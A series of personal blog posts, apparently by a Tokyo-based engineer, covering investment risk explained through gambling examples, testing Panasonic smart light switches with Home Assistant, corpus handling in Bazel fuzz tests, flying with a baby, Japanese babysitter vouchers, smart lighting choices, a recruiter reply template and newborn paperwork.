There is an inherent randomness in investment returns, so I will use gambling examples to account for this. Let’s start with roulette: it has numbers from 1 to 36 (half the numbers are red and the others are black), and a 0 and 00 which are both green. One can bet on black or red and if the ball stops on a number of that color, it pays out double the amount. E.g. betting 100 on black can have two outcomes:

the ball stops on black, then you get 200 (the original 100 plus an extra 100) (+100)
the ball stops on red or green, then you get nothing (-100)

The chance of winning is 18/38 = 47.37% (there are 18 black and 38 spots overall), the chance of loosing is 52.63%. So the expected return is 2*47.37%=0.95 for every 1 money played. This means that playing this long enough, you are guarantee to loose: play it for 1000 times and you will win approximately 474 times and loose 526, and since one loss cancels out one win, you are left with 52 losses. This is to be expected: the casino has to make money, and this is their built-in advantage. Your only chance is to get lucky and win early, then stop playing before the rule of large numbers catches up and pushes you towards the average.

But long term investing is meant to have a positive expected return, and not just be gambling. So let’s see an example with positive expected return and risk.

Generous boss

Your boss makes everyone at the company an offer: you can join the new compensation scheme where at the end of each month he flips a coin, and if it’s head, then you get 2.5x your normal salary, but if it’s tail, then you get no salary that month.

So you have 50% chance of 2.5x salary and 50% chance of nothing, compared to 100% getting exactly your salary. The expected return of the proposed scheme is higher: on average you will win every second month, so in 2 months you would get 2.5 salaries instead of 2 salaries. The expected return is 1.25 salary per month.

So looking at this purely from the expected returns, it would be foolish not to participate. However there is another side of this: the risk of being unlucky multiple times in a row. Let’s say you have a good emergency fund saved up and/or a household with multiple incomes, so you will be fine even if you don’t get your salary for 3 months straight. What is the chance that you get tail on the coin flip 4 times? (0.5)⁴=6.25%. This is a small chance, but if there are 20 people taking this offer, one of them will hit it (on average) in the first 4 months.

But let’s say you have 6 month buffer, so you decide to take this offer. It is within your risk tolerance.

Meanwhile a colleague of yours just bought an expensive house, so most of their savings went against the down-payment and now they are on the hook for the mortgage. They decide to stay with the regular monthly salary, as this extra risk just doesn’t fit into their situation right now (doesn’t worth risking loosing your home over a 25% raise).

Generous boss 2

Your boss offers another compensation scheme option: at the end of the month you will roll two dices. If both are 6, then you get 100x your normal salary. If it’s anything else, then you get nothing.

The first dice can be anything 1 to 6, the second similarly, so there are 36 potential outcomes and only one wins. Thus the chance of winning is 1/36=2.78%. The payout is 100 salary, so the expected return is 100*2.78%=2.78 salary per month, almost 3 times the normal salary.

However it comes with a huge risk: on average one wins once every 36 times, so once every 3 years. The chances of not winning for 5 years is still (35/36)^5*12=18.4%, so one in 5 people will get no salary for 5 years.

That’s just something most people can’t afford to take on (unless they are already wealthy or have other income cover their daily living costs). So while this is an even better option than the previous one, most people will have to decline.

Diversification: the free lunch

There is a way to reduce the risk in the above scenarios: assuming the boss flips a coin / rolls the dice once with each employee, if you and your colleagues agree to pool the money you receive each month and split it equally among all of you, then the risk goes down: even if some of you get unlucky, it is unlikely that at least a few people wouldn’t win, and then you go home with at least half a salary.

Increasing the number of participants reduces the risk further making the monthly payouts closer to the expected return. This is a similar reason why people say that “diversification is the only free lunch” in investing. However while in our example the coin flips are independent (so the chance of all coin flips loosing gets very low as the number of flips go up), stock returns are somewhat correlated: while investing in both McDonald’s and Burger King means that regardless of who’s next burger sells more, at least one will pay out, there is still a chance that people will switch to healthier alternatives, and both burger chains will struggle. To compensate for this, one could invest in literally all companies of the worlds (all publicly traded, that is), but in an economic downturn people simply have less money to spend, so the sales (and thus the profits) of all companies can suffer at the same time. So while diversification reduces the company-specific, idiosyncratic risk, there is always some systematic risk remaining.

And that’s how I got to understand the relationship between expected returns and risk.

Testing the Panasonic Advance Series Link Plus smart light switches

2024-11-10T00:00:00+00:00

We are building a house, and I recently looked into smart lighting and light switches concluding that the best option for us is likely Panasonic’s Advance Series Link Plus switches (アドバンスシリーズリンクプラス). I got my hands on two of the switches and in this post I’ll share what I learned from testing them out.

Getting the switches

As in the previous post it became clear, smart switches are expensive. So before dropping the price of 2 iPhones on this, I wanted to make sure that it will work as I expect it to. We called the Tokyo Panasonic Showroom and asked if they had this line up, but they told us that none of the showrooms in Tokyo had any light switches. I also checked in Yodobashi Camera’s website and while they sell them, they also don’t have them in any of there stores in Tokyo.

So the only option I had left was to buy some of the switches, set them up at home and see how well they work. So that’s what I did. I bought these specific models:

WTY2401W - single switch, 3-4 wire (this takes a ground wire to the switch, while they also have a 2 wire option which doesn’t)
WTY22473W - dimmer switch, 2 wire (there was no 3-4 wire option)
WTY2001 - Link Plus Wireless Adapter (リンクプラス用無線アダプタ). The switches themselves only have bluetooth, so to connect them to the internet (and HomeAssistant), we need this adapter (but the switches and the adapter actually communicate over 920MHz radio not Bluetooth AFAIK).

I also bought two lights, switch plates (in matte gray and white, the two colors we are considering), and two tupperware boxes as frames.

The physical setup

So first I had to prepare the box. I ended up using my soldering kit to cut a hole in the top of the box.

Once the box was ready, I had to figure out which wire was the ground and the phase. First I marked the socket to ensure I will always plug it back the same way, then used this voltage detector to find the wire with the phase, and marked that too.

Then I looked up the wiring diagram for the switch and connected the wires accordingly (there was a small button inside the switch and pressing that with a screw driver the wire slid in easily).

Attached the switch plates, and I was done:

Connecting the smart

Once the wiring was done, I had to connect the switches to the phone and then to the wireless adapter.スイッチアプリ is the app to do this. The app is really designed with a single workflow in mind: electricians build the house, connect all switches, then handover the setup to the owner of the house. Adding additional switches later is not really possible. Moreover somehow the switches connect to each other, and the phone only connects to one of them, which further complicated setting it up.

After a few hours of fight I got it to work. I don’t really have any advice, other than if you want to add any additional device, it is better to reset the app and the switches, and just add everything from the beginning all at once, as that seem to be the main/only supported flow.

There was one more surprise: I was setting up the Link Plus Wireless Adapter (リンクプラス用無線アダプタ), but it didn’t want to connect to the WiFi. Moreover the setup never asked me for the WiFi password, it just told me that the adapter failed to connect to the network. I had the user manual in front of me, but still it took me a while to find the issue:

So the wireless adapter needs wired connection to the LAN, it is only wireless on the other side (towards the switches). Once I plugged in the LAN cord, it showed up on the network. It had a site on port 80 where one could turn the switches on/off and even update the software on the switches. The update required pressing a button on the adapter, but otherwise there was no authentication, so anyone on the network could reach it.

Later this website went away, but the adapter was still reachable via the EchonetLite protocol, which also lacks any authentication. (I really need to set up a separate guest wifi, or move all IoT stuff to a dedicated network.)

Home Assistant setup

I use Home Assistant as my smart home platform. The Link Plus Adapter speaks the EchonetLite protocol (which is heavily used in Japan). Luckily there is a community-developed module to connect EchonetLite devices to Home Assistant named echonetlite_homeassistant. (There is also echonetlite2mqtt in case the first doesn’t work.)

After adding this using HACS and pointing it to the IP of the adapter it worked (it could have done discovery too, but I had the IP handy). Without any auth both switches showed up in Home Assistant:

Testing the dimmer switch

So after the setup worked, I wanted to see what is the delay between Home Assistant and the actual switch. Here is my testing with the dimmer switch:

Overall I found it to be very responsive.

It supports going from being off to going to a specific brightness (e.g. if it was 100% when turned off, then I can turn it on at 10% brightness), however it turns on first as usual (with the previous brightness) then adjusts it quickly. In practice there is a short fade-in effect when turning on anyway, which makes this issue less noticeable, so I don’t think it would be an issue in real life. (The use-case I’m thinking here is that when the light turns on in the middle of the night it should go to low brightness automatically.)

For the dimmer switch I used a simple, dimmable LED bulb (the cheapest I could get from Amazon).

Testing a smart bulb

The dimmer works well, but it doesn’t allow changing the color. Also it’s more expensive than the normal switch, so I was thinking of adding a smart bulb to the normal smart switch and controlling the brightness and color based on time of day (or via additional smart buttons). To test this I connected a ZigBee bulb from IKEA to the switch. (I have a CONBEE II adapter with Phoscon-GW running alongside Home Assistant.)

The bulb adds a slight delay when turning on, but otherwise works well.

When turning on, the bulb immediately shows up in Home Assistant, so we can trigger on that even and adjust the brightness. However when turning off it takes a while until Home Assistant realizes that the bulb is off, so when turning off and on quickly, the automation won’t trigger on either off or on event (as Home Assistant misses them both). I think I could work around this by triggering on the switch turning on and off, as that even is registered immediately.

Here is a test of triggering on the ON event: the light was at 100% when it was turned off, and I configured an automation that when the light bulb is turned on, set its brightness to 1%:

It is almost instant with a very short flash.

Conclusion

Despite the user un-friendliness of the setup, overall I really like the switches. They connected to Home Assistant without issues and they are pretty responsive (both to update their state and also to respond to action). The dimmer switch is nice for places where a physical dimmer makes sense (my wife already said that she would like that in a few places), but for everywhere else we’ll likely go with the normal switch and make the lights smart to control brightness and color.

In the bedrooms we will have the common ceiling light that come with an infrared remote controller (for brightness and color). With the smart switch I think I can automate sending the IR signal after the light is turned on (to have it default to low brightness during the night, and full brightness during the day).

Fuzzing with Bazel: cc_fuzz_test

2024-09-19T00:00:00+00:00

Recently I have been fuzzing C/C++ projects built with Bazel using libfuzzer, so I thought to share my learnings on some of the details on how to do this.

Getting started

Bazel added support for fuzz tests back in 2021 via the rules_fuzzing Bazel library. I recommend starting with the README of that repo then checking out the other docs too.

Passing CLI flags

There are 3 types of CLI flags one can use when running a fuzz test:

Bazel’s usual flags (e.g. --config=asan-libfuzzer)
the fuzz test launcher flags (e.g. --timeout_secs=30)
the fuzzing-engine-specific flags (passed directly to the compiled library) (e.g. in the case of libfuzzer: -max_len)

These are separated by -- when calling bazel, e.g.:

bazel run -c opt --config=asan-libfuzzer //examples:re2_fuzz_test_run \
  -- --clean --timeout_secs=30 \
  -- -max_len 256

To get all the supported flags for your specific tool versions, you can just ask the tools:

bazel run --config=asan-libfuzzer //examples:re2_fuzz_test_run -- --helpfull

and for the libfuzzer flags (mind the double -- and that the flag starts with a single -):

bazel run --config=asan-libfuzzer //examples:re2_fuzz_test_run -- -- -help=1

Corpus

Corpus, the set of initial inputs to pass to the test and then mutate them for additional coverage. Generally there are two types of corpus:

seed corpus: a set of known inputs defined when writing a test to help show some valid (and potentially invalid) inputs to the fuzzing engine. E.g. if the function expects a json with some specific fields, you should pass that as a corpus, otherwise most of the fuzzing engine’s time will be spent on trying to brute-force the json format and won’t reach deeper into the code.
previously generated corpus: when fuzzing stops, it will have a set of inputs that it found to execute different code-paths. Keeping these between fuzzing runs is the way to ensure that the fuzzing engine keeps its progress and doesn’t have to start from zero each time.

In some cases you might have both of these corpora.

rules_fuzzing has 3 ways to pass the corpus to a libfuzzer test (the first two of these should be the same for other fuzzing engines too):

1. Define it in `cc_fuzz_test`

As shown in the docs:

cc_fuzz_test(
    name = "fuzz_test",
    srcs = ["fuzz_test.cc"],
    corpus = glob(["fuzz_test_corpus/**"]),
)

2. Via the `--corpus_dir` launcher option

This is not documented in the repository, but -- --helpfull shows it:

  --corpus_dir: If non-empty, a directory that will be used as a seed corpus for the fuzzer.

For example:

bazel run -c opt --config=asan-libfuzzer //examples:re2_fuzz_test_run \
  -- --corpus_dir="$(pwd)/corpus"

3. Via a libfuzzer argument

Libfuzzer accepts corpus directories as positional arguments:

To run the fuzzer, pass zero or more corpus directories as command line arguments. The fuzzer will read test inputs from each of these corpus directories, and any new test inputs that are generated will be written back to the first corpus directory

For example:

bazel run -c opt --config=asan-libfuzzer //examples:re2_fuzz_test_run \
  -- \
  -- "$(pwd)/corpus"

Multiple corpus definitions

What if more than one of the above 3 are defined? Do the corpora get merged, or do these options override each other?

Turns out the --corpus_dir parameter overrides the corpus defined in cc_fuzz_test, but the one passed to libfuzzer always gets appended.

One can check this by looking at the CLI log when running a test that defines corpus:

bazel run --config=asan-libfuzzer //examples:re2_fuzz_test_run --  -- $(pwd)/corpus2/
...
INFO: Loaded 1 PC tables (101 PCs): 101 [0x00dead,0x00beef), 
INFO:        0 files found in /tmp/fuzzing/corpus
INFO:        5 files found in examples/re2_fuzz_test_corpus
INFO:        1 files found in /home/ubuntu/fuzzing/test-app/corpus2/
INFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes

While if we run the same test but pass the --corpus_dir, then the corpus defined in cc_fuzz_test is not used:

bazel run --config=asan-libfuzzer //examples:re2_fuzz_test_run -- --corpus_dir=$(pwd)/corpus3 -- $(pw
d)/corpus2/
...
INFO: Loaded 1 PC tables (101 PCs): 101 [0x5aee48,0x5af498), 
INFO:        0 files found in /tmp/fuzzing/corpus
INFO:        2 files found in /home/ubuntu/fuzzing/test-app/corpus3
INFO:        1 files found in /home/ubuntu/fuzzing/test-app/corpus2/
INFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes

Long flight with a 6 months old baby

2024-08-08T00:00:00+00:00

We just took a 14.5 hours flight with our 6 months old baby from Japan to Europe and in this post I’ll share how we manged to make it a pleasant experience for everyone involved.

Planning

Taking a direct flight

We were going to Hungary to spend time with my family and friends. However there are no direct flights from Tokyo to Hungary, and in the past we have always flown with a layover (e.g. Dubai, Doha, Istanbul, Warsaw, Helsinki). To keep things easier this time, we flew into Vienna with a direct flight and my mom picked us up by car (it’s only 2.5 hours from Vienna Airport to Budapest). This proved to be a great decision as the hardest part for our baby was take off and landing, and also flying direct meant that the overall travel time was shorter even with the longer drive at the end.

Most airlines offer a baby basinet for kids under 11-14kg for free (though some charge for the seat reservation required for this). We flew with ANA to Vienna and we are going back with Austrian Airline and both asked us to call them to reserve the baby basinet. On ANA it was entirely free including the seat reservation, with Austrian we got charged for the seat reservation.

A flight attendant attached this after take off and removed it before landing, and we had to hold the baby while the seatbelt sign was on.

Timing

We picked a flight leaving late at night (10:45pm) which was a great idea as by that time the baby was so tired that she fell asleep immediately and slept for almost 10 hours, only waking up for a few short times to eat.

Before the flight: keep it low-stress

We were flying on Monday evening and didn’t have any plan for the weekend, so we could pack (and do some last minute gift shopping) comfortably. By Monday morning we were ready to leave. This allowed us to sleep in and have a slow morning. We went out for lunch to our local soba place, then gave the baby a bath, and took a shower ourselves.

Once we were ready, we took a taxi to Kichijoji and took the airport bus from there to Haneda. This meant that it was pretty easy to handle the 3 suitcases with the baby: the taxi dropped us off right where the airport bus leaves from, and at the airport we grabbed a trolley cart. On the way back we will arrive to Narita and we are thinking of taking the Narita Express (it takes longer and more expensive than Skyliner, but takes us directly to Mitaka) and/or use Yamato to send home some of the suitcases from the airport.

At the airport

We arrived to the airport around 6pm and our flight was leaving at 10:45pm. Normally luggage drop off only opens a few hours before boarding, but since we were flying with ANA (one of the big Japanese carriers), who has a hub at Haneda, we could drop off luggage immediately and we also got a stroller for the baby that we could keep until the gate.

We had dinner at the airport, hung out at the lounge (until they closed at 8pm) then went through security and passport control. One of the perks of traveling with a baby is that we could use the priority queue at all of these, and didn’t have to wait at all. Our baby usually goes to sleep around 8, so she slept a bit in the baby carrier. She couldn’t sleep deeply with all the lights, but it was enough to keep her happy.

The flight

Traveling with a baby meant that we could board first.

Take off was the trickiest part as we had to keep our seatbelt on and hold the baby, but it went without issues. My wife would have fed her if she would not have been happy, but it was fine.

During take off and landing the air pressure changes, so ears can pop. To avoid this discomfort it is generally recommended to swallow to open the ear canals, and thus feeding the baby is a good idea. For our case she kept sucking on her pacifier and that seemed to have been enough.

Once the seatbelt sign was off, a flight attendant installed the baby basinet. The baby ate and then fall asleep and slept for almost 10 hours, only waking up a few times to eat. As the flight was leaving in the night, the crew turned down the lights inside the aircraft after takeoff, which helped a lot to keep the baby sleeping. And it also helped us take a rest (for which the extra legroom was really helpful).

After around 10 hours, the baby woke up and the crew turned on the lights shortly after. Our baby is usually energetic in the morning, so she was fine, played a bit with the flight attendants and nearby passengers. We got breakfast, and we were almost ready to land.

The crew took away the baby basinet before landing, and we had to hold the baby, but she was fine. The landing itself went without issues (again my wife would have fed the baby if she would not have been happy).

From the airport

Luggage pickup and passport control went well, and we were on our way to meet my mom who came to pick us up at the airport. The drive home, while only 3 hours, was actually one of the hardest parts, as the baby is not yet used to the child seat. We don’t have a car in Tokyo, and while we rented cars a few times to try, she is still not fully used to it. But even here she only cried a few times, and slept big part of the way.

How to use the corporate babysitter vouchers (ベビーシッター派遣事業割引券)?

2024-08-02T00:00:00+00:00

All levels of the Japanese government have various programs to support people with kids. One of this, ベビーシッター派遣事業割引券, is a national program subsidizing baby sitters for working parents: companies can purchase baby sitter tickets and give it to their employees. My company is participating in this, and since it is a bit complicated to use, I’ll describe how to use it in this post.

1. Get the tickets from your company

My company uses a Google Form that employees can fill out and get 1-4 tickets assigned each week on Friday mornings. We have 2 weeks to use them, then they get revoked. Also we are only allowed to use them during working hours and not during weekends. Check your internal rules on how to apply and any additional conditions.

Once you get the tickets, you should receive a set of URLs like this: https://atms-bs.jp/eticket/e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e that show a site like this:

At the bottom of the page you can see the ticket code, the authentication code, the approval number, your employer’s name and your name:

2. Find a baby sitter site that accept these coupons

This involves a lot of Googling and/or asking your colleagues and HR for recommendations. We had success with (Poppins Sitter)[https://smartsitter.jp/], but since most of these websites just connect you with some local, freelancer baby sitters, the availability and quality of the sitters will vary greatly between locations.

Some other websites I’ve seen recommended:

Though I don’t have experience with these.

Make sure the site accepts these tickets (also sometimes the program is called こども家庭庁ベビーシッター券 and I believe it’s the same thing).

3. Find a baby sitter

This is the hardest part: look through the listings on the site and find someone that is available and looks good to you. Make sure the sitter accepts the tickets, as some could choose not to, even if the platform supports it. There should be a search condition for this.

You might want to message the baby sitter at this point if you have any question or to confirm the date, however do not schedule the time yet.

4. Register the tickets on the website

You need to register the baby sitter tickets by their ID on the reservation website, e.g. this is how to do it with Poppins Sitter. Even though some of the numbers will be the same between tickets, you still need to add each ticket one by one.

5. Schedule the baby sitter

Make the reservation on the website and select the previously registered tickets. With some sites (like Poppins Sitter) the discount is reflected immediately and you only pay the remaining price. I have seen some sites where they charge you the full price and later refund the value of the tickets.

6. Active the ticket

This is the step that we missed initially and the baby sitter platform ended up e-mailing us. Even though you already registered the ticket, you still need to manually activate each ticket. This can be done on the day of the sitting or afterwards.

Open the URL that came with the ticket (the one like https://atms-bs.jp/eticket/e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e)
Tick the 上記内容を確認し同意します checkbox and click the チケットを利用する button
If the babysitter has a QR code, you can scan it. Otherwise click the QRコードが読み取れない場合はこちら link, find the code of the platform (e.g. 222R222 for Poppins Sitter) and enter that
Confirm the name of the baby sitter company, input the time of the sitting, the name of the child, the birthday of the child, the baby sitter’s name and the prefecture of use:
Accept the privacy policy and go to the next page
Confirm what you just entered and click 利用する（確定） if everything looks good
Done!

Repeat this for each tickets.

The site doesn’t remember any of the data (it would be nice to have at least the baby’s name and birthday pre-filled), but Chrome’s drop-down form fill help at least remembers the name of the sitter and the child.

Smart lighting options in Japan

2024-07-28T00:00:00+00:00

We are in the process of building our house, and I want to use this opportunity to add some smart home solutions. Right now my focus is on ensuring that the things that come with the house are capable of “being smart” (controlled with automation). Big part of this is lighting, and in this post I’ll review what I learned about smart lighting options available in Japan.

Our goals

Our requirements for the smart light setup:

Works with Home Assistant - I used it in the past and really liked it
Reliable - I want to limit the times I have to reconnect/re-pair devices
No batteries - again, low maintenance as much as possible
Lights need to work even if all the smart home is broken. I don’t want to end up in a dark house just because an update went wrong and I need to rebuild/restore the config (also I especially don’t want my family in this situation). There has to be an intuitive fall-back that works (e.g. turn light on-off-on to bring it back to full brightness)
Should be intuitive and should enhance the experience for everyone including when we have guests over
Should not make us stupid. We have relatives who have automatic light in the toilet at home, so they often forget to turn off the light when they are at our place. Especially for our small kids, the home is where they learn how a house works, so making sure they know what a light switch is, is important.

Japan-specific rules

After reading many reddit and facebook posts, the general consensus seems to be the following:

only certified electricians are allowed to do any work on the electric network that requires the breaker to be turned off. So e.g. a regular person can change a lightbulb or install a new lamp, but can’t rewire a switch. The main issue with this being illegal is that if there is a fire, the insurance company might claim that it happened due to the unlicensed electrician work and refuse to pay. (But there are some people that say that the risk of this is pretty minimal unless the fire was from the electric device.) One workaround to this is to get the electrician’s license, which (to my surprise) some foreigners actually do just for the sake of doing work on their own homes.
most electricians refuse to install smart switches imported from abroad if they have not been certified in Japan. This includes not only random stuff from Aliexpress, but also reputable, widely used brands from the US or Europe (e.g. Inovelli)

I have heard these mentioned at multiple threads, so this seems to be the general consensus, but I did not check the relevant laws in detail, so it might be incorrect.

There is one more condition, specific to our home: we plan on applying for some government subsidies for building an energy efficient house, and this means that all lights have to be energy efficient. Since we are working with a big builder, Ichijo, they said that this means that we have to get all lights from them and can’t bring our own or buy lights elsewhere (even if the other lights would fulfill the energy efficiency requirements, the builder just doesn’t want to handle the additional paperwork). So initially we have to get all lights from them, but we can change them later.

Options

So what smart lighting options do exist? There are generally two approaches:

smart bulbs
smart switches

Smart bulbs

Many company from IKEA to Philips offer smart light bulbs that connect to some network (e.g. Zigbee or Wifi) and can be controlled remotely. They often offer brightness and color or color temperature controls too.

They are pretty cheap starting from around 1,000 yen for a dimmable IKEA LED bulb to 9,000 yen for a full RGB Philips Hue bulb (both of these work with Zigbee).

These systems require the bulbs to be powered on at all times, and the use of additional buttons as switches (IKEA and Philips both sell these buttons). And this is where the main issue comes in. We have two options for what to do with the traditional switches in this setup:

Leave them as-is (they can cut the power to the bulbs). This is good as a fall-back if the smart lights disconnect or if HomeAssistant is down (most lights will go back to full brightness if you turn them on-off-on quickly), but they present an issue: if someone turns off a light with the switch, there is no way for an automation to turn it back on.
Remove the old switches and connect the lights to power permanently. This is an issue when there is any problem with the smart system, and also one needs to turn the breaker off when switching light bulbs. This operation should be done by an electrician and one would need to undo them before selling the house.

Both of these options come with compromise that I don’t like.

Smart switches

The other approach is to use smart switches: these can be operated manually (you press them, they turn the light on/off), and also remotely. Some of them are capable of dimming the lights, and they do this by sending less electricity to the bulbs (so not all lights will be compatible with them).

Normally a live wire is connected to the switch, then from the switch to the light, then the light to the neutral. When the switch is on, it connects the 2 wires and current will flow to the light. When the switch is off, the wires are disconnected, so no current is flowing and the light stays dark. However this presents a problem: when no current is flowing, the switch also doesn’t have power to operate. There are two main ways to solve this:

2-wire type switches: these are connected like regular switches (one side to the live wire, one to the light), but even when they are off, they let through a small amount of current. This makes it possible for them to operate, and the small current should still leave the lights dark. However this depends on the light, and some might make some humming noise or produce a bit of light. These switches can be used to directly replace existing, dumb switches without additional wiring.
3-wire type switches: the switch gets an additional wire, a neutral. So now it can create two circuits: (live - switch - neutral) for the switch’s operation and the usual (live - switch - light - neutral) for running the light. This means that when the light is off, there is no current flowing through the light. But it needs the extra neutral wire at the switch that dumb switches don’t usually have.

Since we are building our house from scratch, we can easily bring neutral wires to the switches, so we will go with the 3-wire type switches.

The smart switch approach can’t adjust the color of the lights, so e.g. you can’t make your lights follow the circadian rhythm (make the lights warm white at night).

From this blog post I found 3 options available in Japan:

Panasonic’s Advanced Series Link Plus - these use Bluetooth, and can be controlled directly from your phone (within Bluetooth range) and they come with an optional hub that let’s you control them over WiFi. The hub supports the Echonet Lite protocol and echonetlite_homeassistant supports the hub. This is my preferred option, and I will go into more details later.
Odelic Connected Lighting - I like that their regular switches have a joystick-like circular button in the middle to control brightness and color temperature, and the switch is a bit cheaper than Panasonic (starting from 15,000 yen). However if I understand correctly these switches only work with their own lights, as they keep the lights powered on at all times and then communicate via bluetooth from the switch to the light. Not a bad design, but since we have to get our lights from the builder, this won’t work for us (also the vendor lock in is an issue, e.g. if this company goes out of business or stops making these smart lights, we can’t get lights from an other company)
Koizumi TRee - I didn’t look into it deeply as their simple switch is 20,800 yen and the hub is 45,000 yen making them more expensive than Panasonic. But since their reference wiring diagram only has item numbers for the switches and not for the lights, I’d assume it works with any light (similar to Panasonic’s system). Also the website clearly mentions EchonetLite support, which is a plus.

So I prefer the Panasonic one, but that’s pricey: a simple switch retails for 16,000 yen and the one with dimmer goes for 21,000 yen (around 10x more than the price of a “dumb” switch). And one also needs the hub (無線アダプタ) for 34,000 yen and potentially repeaters every 30m for another 26,000 yen each. A quick calculations shows that just the switches in our new house would be around 400-500,000 yen.

In comparison, Inovelli’s 2-1 Switch is only $50 (7,000-8,000 yen) and Xiaomi Mijia BLE switches are around 2,000 yen from Aliexpress. But these would either need me to get an electrician license, find an electrician who is willing to install them, or risk issues with insurance.

Benefit of the Advanced Series (other than being the only option): the switches look sleek, are intuitive to use for humans (great for guests), have 2-wire and also 3-wire types, and our builder (Ichijo) said that they are willing to install it, so we can have them ready by the time we move in (and potentially save on the cost of the original switches and the installation).

Conclusion

Considering the pros and cons of both options, I’m leaning towards the smart switches option with additionally having some of our lights smart too for color control. At these lights we only need a regular smart switch (not the dimmer one), which saves a bit on the switch.

A low-effort way of getting paid well

2024-05-17T00:00:00+00:00

I work in IT, which generally means great salaries, but there is still a difference between companies. Moreover changing jobs leads to higher compensation on average, as one is in a better negotiation position when joining a company compared to when simply asking for a raise.

However constantly looking for jobs and interviewing requires substantial efforts, so I have a more passive approach to it.

Let the recruiters work for you

As most people in IT, there are a few recruiters every week/month reaching out about an amazing new opportunity. They send these emails automatically to anyone who matches their criteria, so instead of me checking the job post and try to figure out if it could be a good fit, I play a reverse Uno card and send them back a template answer with my requirements:

Hi,

Thanks for reaching out! Right now I’m not looking for new opportunities as I am very satisfied with my current position. Thus for me to consider a position it has to fulfill the followings:

x million yen yearly total compensation

Generous PTO policy, including paternity leave

English-speaking team

Full remote or hybrid (in Tokyo) work arrangement

Senior or staff engineer title

Please let me know if you have something that would match these criteria.

Thanks and kind regards,

The real message has an actual value for compensation that I will talk about later.

This essentially gives all the inputs a good recruiter needs to see if the job could be a fit for me or not, and then we can continue accordingly. Recruiters should have these information readily available, and even if the job post doesn’t talk about compensation, they generally know the band, so they can see if my ask is within that. This way we can both avoid investing more effort into something that will definitely not work out.

This also opens up the possibility for the recruiter to consider me for any other job that might come across their desk, if it fits my requirements.

Deciding your price

The criteria that makes or breaks most job posts is whether the company is willing to pay the compensation I’m asking for. This is especially true on the Japanese IT job market, where traditional Japanese companies treat IT engineers as a normal office worker paying them the general salaryman salary (~5 million yen), while companies competing for foreign talent (branches of foreign companies like Google, Amazon, Indeed, and modern Japanese companies like Woven, Mercari) will pay closer to the IT salaries of other developed countries (not necessarily Silicon-valley-level craziness, but 20m yen+ is possible from senior engineer, engineering manager level). This also leads to funny situations, like when the recruiter wanted to confirm if I added an extra 0 by mistake, saying that even the CEO doesn’t make as much as I asked for.

So how do I come up with the amount? I start with my expected total yearly compensation of next year at my current job, then depending on how much I enjoy my current work I add 10-30%. Unless I’m unhappy with my current workplace, I wouldn’t go below 10%, to compensate for the risk that the job might be worse than the current one (and there is only so much information I can gather during the interviews).

One more factor I consider is how busy I am in my life, e.g. I just had a baby, so right now I would need much more to convince me to go through all the interviews and onboarding, so I make the percentage higher.

While I have a default price in my template, if the recruiter starts with mentioning the company or industry, I sometimes adjust it. E.g. banking/finance? Let me add another 10% as I have doubts about how much fun the work would be. Crypto? Let me add another 20% to compensate for the instability. Space-related? Maybe I can lower the % a bit.

Ultimately I believe that for 99% of people if a job opportunity comes along that is identical to their current job but pays twice, they will take it. So companies shouldn’t expect loyalty, instead they should ensure that they pay people well, and provide good conditions, so that that extra % is high enough to push people out of band for other places.

Newborn baby paperwork in Tokyo

2024-05-09T00:00:00+00:00

We recently had a baby in Tokyo, and in this post I’ll share our experience with the required paperwork (mostly in chronological order).

Our situation for reference:

my wife is Japanese, thus our baby is also Japanese, so the baby doesn’t need residence card and visa
we live in Tokyo, and some of these programs are provided by the Tokyo prefecture (but other prefecture might have similar programs)
I work for a Japanese company as a fulltime employee (会社員), and they provides my health insurance

1. Hospital: get the birth certificate

In the hospital we received a paper like this:

The hospital filled out the right side (the one circled in red), and we needed to fill out the rest. This is one of the things to bring to the city hall in the next step.

2. City hall: Register the birth

Submit the above mentioned document (出生届, しゅっせいとどけ, Birth registration) at the city hall. One parent can do this without the baby (but note that in this case only that parent can request the 出生届受理証明書, Certificate of birth registration acceptance, document that some embassies require). You can find the details on your city’s website, e.g. for Mitaka: https://www.city.mitaka.lg.jp/c_service/000/000307.html

There is also a page in the Mother’s Book about the childbirth, that we filled out at home and the city hall stamped it. My company asked for a copy of this when applying for the insurance card for the baby.

Once submitted, the city hall staff asked me to go to 2 other counters in the city hall to do the next 2 steps.

3. City hall: 乳幼児医療費助成（にゅうようじいりょうひじょせい）Subsidies for medical treatment of infants

Normally we pay for 30% of medical costs (rest is insurance), but Tokyo covers even that 30% for children living in Tokyo. You need to apply for this though, and that’s this step. The form was simple and they helped me fill it out.

They asked me to come back and show the baby’s insurance card once it was ready, and at that time they gave me the certificate (piece of paper). The hospital asked us to bring these two (baby’s insurance card, this certificate) to the one month check-up.

At this point they also explained the process of how to get a refund for medical costs incurred before getting this certificate or outside of Tokyo (where kids need to pay 30% as usual and we can ask it back from Tokyo later).

4. City hall: 児童手当（じどうてあて）Child Allowance

For kids up to 15 years old Japan gives a monthly allowance depending on the income of the parents: https://www.city.mitaka.lg.jp/c_service/031/031574.html As of early 2024, if the parents make more than 12 million yen, then they are not eligible for this, however from December 2024 the income limit is planned to be removed.

There were other things at the city hall that one can apply for, but they were not relevant for us. Check your city’s website for details.

5. City hall or konbini: 住民票 (じゅうみんひょう) Residence certificate with the baby listed

As the baby is part of my household, I could request a 住民票 at a konbini using my own My Number card (after the baby was registered at the city hall). I could have also asked for this at the city hall, but it takes a long time at our city hall and also more expensive than getting it at a konbini. Don’t include the MyNumber on the certificate (otherwise you will be asked to mask it later). Getting this is important for the 018 Support application (in a later step).

6. Registered the baby in my company’s HR system

As the baby is my dependent, I had to add them to my company’s HR system. This process also included the application for the health insurance card for the baby (as they are covered by my company’s health insurance), and application for a congratulatory money (a one time 10,000 yen minus tax). In addition, I also had to apply for the parental leave on a separate form (my company provides more than the legally required, so this might be different for other companies).

The baby’s health insurance card arrived to our home in 9 days after applying for it.

It took 1.5 week for the parental leave days to show up in the holiday request system (but the system allows marking the days retroactively, so I could start my paternity leave right after the baby was born).

7. City hall: once you get the baby’s insurance card, pick up the 乳幼児医療費助成 certificate

My city hall asked me to either mail them a copy of the baby’s insurance card, or show it in person to receive the 乳幼児医療費助成 certificate requested earlier. I went in-person and got the certificate quickly (my wife called them earlier, so they had it ready).

8. Online: apply for Tokyo’s 018 Support

